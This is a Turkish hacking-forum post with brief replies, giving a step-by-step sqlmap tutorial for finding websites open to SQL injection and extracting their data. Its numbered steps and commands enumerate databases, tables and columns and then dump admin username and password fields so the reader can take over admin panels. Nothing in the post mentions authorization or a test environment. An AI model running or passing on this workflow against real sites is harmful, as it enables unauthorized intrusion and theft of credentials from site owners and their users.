Sqlmap Kullanımı Ayrıntılı ////JR

Jolly Roger

Katılımcı Üye
14 Mar 2017
414
1
root@jolyrgr
Selamun Aleyküm Beyler Birçok Kişimiz Sqlmap'i Nasıl kullanacağımızı soruyor.. Aslında Baya Basit Bir işlem Ben Bunun İçin Burda kısaca anlatıcam Birde Video Çektim Videoyu izlemeniz daha yararlı olacak çünkü videoda hem nasıl site bulacağımızı hemde bulduğumuz sitede sql açığı olup olmadığını anlattım bundan dolayı videoyu izlemeniz çok faydalı olacak. ayrıca nasıl kurulacağını bilmeyenler için bir video daha çektim onuda izleyebilirsiniz...

Not: Yazılı anlatım tercih etmeyenler videoyu izlesin video kısa ve yararlı :)

***Anlatıma Geçelim***
1-Öncelikle Açıklı Bi Site Bulucaz Bu İşlem Size Kalmış (Bilmeyenler Videoyu İzlesin)
2-Sqlmapi Kurulacak Nasıl (Bilmeyenler Videoyu İzlesin)
3-Üstteki 2 maddeyi tamamladıktan sonra sqlmapi açıp kodları yazacaksınız.
4-Bu Kod İle Siteyi Tarama işlemine başlayacaksnız.
Kod:
sqlmap.py -u www.siteadresi.com --dbs
5-Bu kodun sonrasında sitenin kolonları eğer sql injection başarılı olacaksa gelecektir
6-Gelirse Bu Kodu Yazacaksınız
Kod:
sqlmap.py -u www.siteadresi.com -D kolon_adı --tables
Not:Bu Kodu yazarken 2 tane database ismi görebilirsiniz biri schame ile başlayan o database hep vardır o databaseden birşey çıkmaz o yüzden ilk çıkan databaseyi yazmalısınız
7-Daha sonra kolonlar düşecektir Düşen Kolanlardan admin,user,adminstrator, gibi kolonlar varsa onları çekmemiz gerekli çünkü admin cp girişleri orda yer alır
8-Mesela birçok kolon geldi ve aralarında admin kolonu var diyelim bu kodu yazın
Kod:
sqlmap.py -u www.siteadresi.com -D kolon_adı -T admin --columns
9-Üstteki kodu yazdıktan sonra admin kolonundaki bilgiler gözükecektir
10-Bu bilgilerde genellikle user,pass olur yani kullanıcı adı şifre yazmanız gereken kod
Kod:
sqlmap.py -u www.siteadresi.com -D kolon_adı -T admin -C user,pass --dump
11-Bu kod ile de admin kolonunda bulduğumuz user,pass verilerini dump kodu ile öğreniyoruz işte işlem bu kadar basit
Eğer Yapamazsanız Videoyu İzleyin Herşeyi anlattım ayarıntılı..

Sqlmap Kullanımı: [ame]https://www.youtube.com/watch?v=rBkx9lUcxGI[/ame]

Windowsa Sqlmap Kurulumu : [ame]https://www.youtube.com/watch?v=thb9eRY0eqw&t=4s[/ame]
JR\\\\\\Saygılarımla//////JR

Jolly Roger

Katılımcı Üye
14 Mar 2017
414
1
root@jolyrgr

Yeni Üyeler İçin Bi paylaşım yapayım dedim :) ama yinede teşekkür ederim

V7 nin konusuna benzemiş ama eline sağlık yeni arkadaşlar için yararlı :)

Teşekkür ederim yeni +3000 üye için tekrar gerekliydi

Teşekkür Ederim sağolun

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.